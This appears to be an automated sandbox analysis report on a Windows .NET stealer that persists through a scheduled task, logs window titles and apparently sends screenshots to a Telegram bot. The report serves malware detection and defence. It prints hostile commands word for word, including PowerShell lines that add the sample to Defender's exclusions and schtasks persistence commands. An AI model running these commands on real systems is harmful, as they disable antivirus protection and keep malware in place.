                    Source: oS6KsQIqJxe038Y.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: #]??Y-)\S.PdB source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: W.pdb4 source: oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 00000000.00000002.2265406879.000000000485B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Isyl.pdb source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr
                    Source: Binary string: Isyl.pdbSHA256 source: oS6KsQIqJxe038Y.exe, XgbXowhljC.exe.0.dr

                    Data Obfuscation

                    Source: 0.2.oS6KsQIqJxe038Y.exe.5600000.5.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack, u2hrBWS7a8s3GxO9MO.cs.Net Code: xr33CSJ2UXBl2g2sUnA System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133FAA0 pushad ; retf 0_2_0133FCD2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133E180 push esp; retf 0_2_0133E182
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133DD51 push edx; retf 0_2_0133DD52
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_01339C50 push ds; retf 0_2_01339C52
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0133DCE8 push edx; retf 0_2_0133DCFA
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_01339CC1 push ds; retf 0_2_01339CC2
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0B617198 pushfd ; retf 0_2_0B6171A1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF92E20 push 0004C2FFh; retn 0004h0_2_0BF92E3B
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF993C7 push edx; retf 0_2_0BF993C8
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF9934A push ebx; retf 0_2_0BF9934C
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeCode function: 0_2_0BF9924D push esp; retf 0_2_0BF99254
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057FD8E0 pushfd ; ret 11_2_057FD919
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exeCode function: 11_2_057FD8D2 push eax; ret 11_2_057FD8D9
                    Source: oS6KsQIqJxe038Y.exeStatic PE information: section name: .text entropy: 7.80203646179826
                    Source: XgbXowhljC.exe.0.drStatic PE information: section name: .text entropy: 7.80203646179826
                    Source: 0.2.oS6KsQIqJxe038Y.exe.7580000.6.raw.unpack (multiple .cs files): High entropy of concatenated method names
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeFile created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: oS6KsQIqJxe038Y.exe PID: 6524, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: XgbXowhljC.exe PID: 5436, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: 12F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: 4D10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: 8F10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: 9F10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: A120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: B120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 1000000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 2D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 2C70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 8A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 9A90000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory allocated: AC80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6276
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3413
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6559
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3117
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Window / User API: foregroundWindowGot 1589
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Window / User API: foregroundWindowGot 1479
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe TID: 4956 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2820 Thread sleep time: -7378697629483816s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe TID: 4448 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe File opened: C:\Users\user\AppData
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%"*
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx+&
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3403613356.0000000000401000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: vmtools
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Memory written: C:\Users\user\AppData\Roaming\XgbXowhljC.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpF214.tmp"
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe Process created: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe "C:\Users\user\Desktop\oS6KsQIqJxe038Y.exe"
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XgbXowhljC" /XML "C:\Users\user\AppData\Local\Temp\tmpFCC3.tmp"
                    Source: C:\Users\user\AppData\Roaming\XgbXowhljC.exe Process created: C:\Users\user\AppData\Roaming\XgbXowhljC.exe "C:\Users\user\AppData\Roaming\XgbXowhljC.exe"
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ue,"result":{"message_id":3552,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736895,"document":{"file_name":"ScreenshotnEqzxdUQ.BMP","mime_type":"image/bmp","file_id":"BQACAgQAAxkDAAIN4GdHd39kWjj4a6G2lFW9fiwQws6zAAI_FgACKNA5UmPrLYzl8sr4NgQ","file_unique_id":"AgADPxYAAijQOVI","file_size":3932214},"caption":"DC-SC:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:44]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :46:28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:27]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:43]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager>l
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:29]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7:13]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:45]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager#
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:10]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>X
